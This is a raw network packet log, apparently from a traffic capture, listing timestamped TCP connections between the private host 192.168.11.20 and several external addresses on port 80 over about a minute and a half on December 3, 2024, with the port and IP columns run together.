                                                                            Dec 3, 2024 18:56:15.996474028 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.996511936 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.996802092 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.997431040 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:16.184837103 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:21.957622051 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:22.289702892 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.289954901 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:22.293411970 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:22.625422001 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.625554085 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.625566006 CET8049770149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:22.625732899 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:23.809555054 CET4977080192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:24.825762033 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:25.165873051 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.166110039 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:25.169666052 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:25.509712934 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.509771109 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.509803057 CET8049771149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:25.510004044 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:26.684005022 CET4977180192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:27.700092077 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:28.037817001 CET8049772149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:28.038042068 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:28.041656017 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:28.041711092 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:28.041753054 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:28.379270077 CET8049772149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:28.379411936 CET8049772149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:28.380202055 CET8049772149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:28.381211042 CET8049772149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:28.381227970 CET8049772149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:28.381371021 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:29.542733908 CET4977280192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:30.558881998 CET4977380192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:30.900732040 CET8049773149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:30.900979042 CET4977380192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:30.903491020 CET4977380192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:31.244102001 CET8049773149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:31.244235039 CET8049773149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:31.244246006 CET8049773149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:31.244538069 CET4977380192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:31.245223999 CET4977380192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:56:31.585906982 CET8049773149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:56:36.939415932 CET4977480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:37.280910969 CET8049774101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:37.281183004 CET4977480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:37.284750938 CET4977480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:37.626466036 CET8049774101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:37.626771927 CET8049774101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:37.626821041 CET8049774101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:37.627041101 CET4977480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:38.790623903 CET4977480192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:39.806801081 CET4977580192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:40.155945063 CET8049775101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:40.156771898 CET4977580192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:40.160304070 CET4977580192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:40.509500027 CET8049775101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:40.509767056 CET8049775101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:40.509814978 CET8049775101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:40.509996891 CET4977580192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:41.665076017 CET4977580192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:42.681166887 CET4977680192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:43.029747009 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.030029058 CET4977680192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:43.033647060 CET4977680192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:43.033720016 CET4977680192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:43.382404089 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382436037 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382489920 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382513046 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382827997 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382878065 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382917881 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.382944107 CET8049776101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:43.383183956 CET4977680192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:44.539400101 CET4977680192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:45.555519104 CET4977780192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:45.903223991 CET8049777101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:45.903445005 CET4977780192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:45.905855894 CET4977780192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:46.253267050 CET8049777101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:46.253573895 CET8049777101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:46.253611088 CET8049777101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:46.253917933 CET4977780192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:46.254565001 CET4977780192.168.11.20101.35.209.183
                                                                            Dec 3, 2024 18:56:46.601983070 CET8049777101.35.209.183192.168.11.20
                                                                            Dec 3, 2024 18:56:51.731131077 CET4977880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:52.084115028 CET804977838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:52.084336042 CET4977880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:52.088087082 CET4977880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:52.441225052 CET804977838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:52.441274881 CET804977838.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:52.441476107 CET4977880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:53.599905968 CET4977880192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:54.617234945 CET4977980192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:54.970309973 CET804977938.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:54.970519066 CET4977980192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:54.974092007 CET4977980192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:55.327166080 CET804977938.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:55.327203989 CET804977938.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:55.327382088 CET4977980192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:56.489902973 CET4977980192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:57.506072998 CET4978080192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:57.854146004 CET804978038.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:57.854415894 CET4978080192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:57.858030081 CET4978080192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:57.858108997 CET4978080192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:58.206167936 CET804978038.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:58.206275940 CET804978038.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:58.206559896 CET804978038.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:58.206809044 CET804978038.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:58.206913948 CET804978038.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:56:58.207170963 CET4978080192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:56:59.364269018 CET4978080192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:57:00.380358934 CET4978180192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:57:00.732949018 CET804978138.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:57:00.733118057 CET4978180192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:57:00.735588074 CET4978180192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:57:01.088125944 CET804978138.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:57:01.088193893 CET804978138.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:57:01.088424921 CET4978180192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:57:01.089076042 CET4978180192.168.11.2038.47.232.202
                                                                            Dec 3, 2024 18:57:01.441534996 CET804978138.47.232.202192.168.11.20
                                                                            Dec 3, 2024 18:57:06.421080112 CET4978280192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:06.575985909 CET8049782208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:06.576291084 CET4978280192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:06.579806089 CET4978280192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:06.734703064 CET8049782208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:09.097208977 CET4978380192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:09.252110958 CET8049783208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:09.252290010 CET4978380192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:09.255850077 CET4978380192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:09.410690069 CET8049783208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:11.784152031 CET4978480192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:11.939003944 CET8049784208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:11.939174891 CET4978480192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:11.942780972 CET4978480192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:11.942831039 CET4978480192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:12.097583055 CET8049784208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:14.471034050 CET4978580192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:14.625695944 CET8049785208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:14.625853062 CET4978580192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:14.628333092 CET4978580192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:14.789364100 CET8049785208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:16.592514992 CET8049785208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:16.592863083 CET4978580192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:16.593499899 CET4978580192.168.11.20208.91.197.39
                                                                            Dec 3, 2024 18:57:16.748325109 CET8049785208.91.197.39192.168.11.20
                                                                            Dec 3, 2024 18:57:21.859678984 CET4978680192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:22.211553097 CET804978643.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:22.211801052 CET4978680192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:22.215358019 CET4978680192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:22.567178965 CET804978643.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:22.567423105 CET804978643.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:22.567433119 CET804978643.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:22.567724943 CET4978680192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:23.718259096 CET4978680192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:24.734447002 CET4978780192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:25.093360901 CET804978743.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:25.093525887 CET4978780192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:25.097084045 CET4978780192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:25.455884933 CET804978743.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:25.456001043 CET804978743.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:25.456015110 CET804978743.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:25.456160069 CET4978780192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:26.608289957 CET4978780192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:27.624505997 CET4978880192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:27.974009037 CET804978843.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:27.974239111 CET4978880192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:27.980456114 CET4978880192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:27.980535030 CET4978880192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:28.329687119 CET804978843.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:28.329864979 CET804978843.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:28.329901934 CET804978843.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:28.329911947 CET804978843.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:28.330164909 CET804978843.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:28.330390930 CET4978880192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:29.482652903 CET4978880192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:30.498788118 CET4978980192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:30.856045008 CET804978943.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:30.856234074 CET4978980192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:30.858681917 CET4978980192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:31.215564966 CET804978943.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:31.221328020 CET804978943.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:31.221340895 CET804978943.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:31.221664906 CET4978980192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:31.222315073 CET4978980192.168.11.2043.205.198.29
                                                                            Dec 3, 2024 18:57:31.578979969 CET804978943.205.198.29192.168.11.20
                                                                            Dec 3, 2024 18:57:36.367908955 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:36.494188070 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:36.494355917 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:36.497899055 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:36.624120951 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.499919891 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.499948025 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.500071049 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.500087023 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.500189066 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.500250101 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.652601004 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.652800083 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.652869940 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.652960062 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653039932 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653045893 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.653100967 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653122902 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.653146982 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653191090 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653261900 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653295040 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.653343916 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653393984 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.653436899 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653476954 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.653543949 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.653625011 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.780241966 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.780287027 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.780316114 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.780428886 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:37.781050920 CET8049790172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:37.781250954 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:38.011982918 CET4979080192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:39.028250933 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:39.154704094 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:39.154917955 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:39.158487082 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:39.284784079 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.298289061 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.298348904 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.298393011 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.298434973 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.298583031 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.298641920 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.434534073 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.434583902 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.434629917 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.434662104 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.434890985 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.438117027 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438177109 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438256979 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438302040 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438348055 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438368082 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.438435078 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438440084 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.438491106 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438652992 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438659906 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.438715935 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.438901901 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.438996077 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.439085007 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.572027922 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.572046041 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.572057962 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.572246075 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.572253942 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.572485924 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.572521925 CET8049791172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:40.572643042 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:40.667762041 CET4979180192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:41.683825970 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:41.810318947 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.810586929 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:41.814188004 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:41.814264059 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:41.940768003 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.940817118 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.940838099 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.941204071 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:41.941246033 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724123001 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724138975 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724152088 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724163055 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.724317074 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.724420071 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.871663094 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.871711969 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.871895075 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.872592926 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.872843981 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.872900963 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.872937918 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.873042107 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.873092890 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.874455929 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874681950 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874741077 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874784946 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874831915 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874898911 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.874911070 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.874943018 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.875025034 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:42.875130892 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:42.916642904 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:43.003367901 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.003376007 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.003381968 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.003590107 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:43.004251003 CET8049792172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:43.004499912 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:43.323312044 CET4979280192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.339651108 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.466362000 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:44.466814995 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.470689058 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:44.597280979 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:45.448976994 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:45.450135946 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:45.450378895 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:45.450925112 CET4979380192.168.11.20172.67.187.114
                                                                            Dec 3, 2024 18:57:45.577282906 CET8049793172.67.187.114192.168.11.20
                                                                            Dec 3, 2024 18:57:50.628071070 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:50.754358053 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:50.754503965 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:50.758130074 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:50.884538889 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285345078 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285422087 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285510063 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.285621881 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:51.285949945 CET8049794104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:51.286096096 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:52.259030104 CET4979480192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.275032043 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.400907993 CET8049795104.21.57.248192.168.11.20
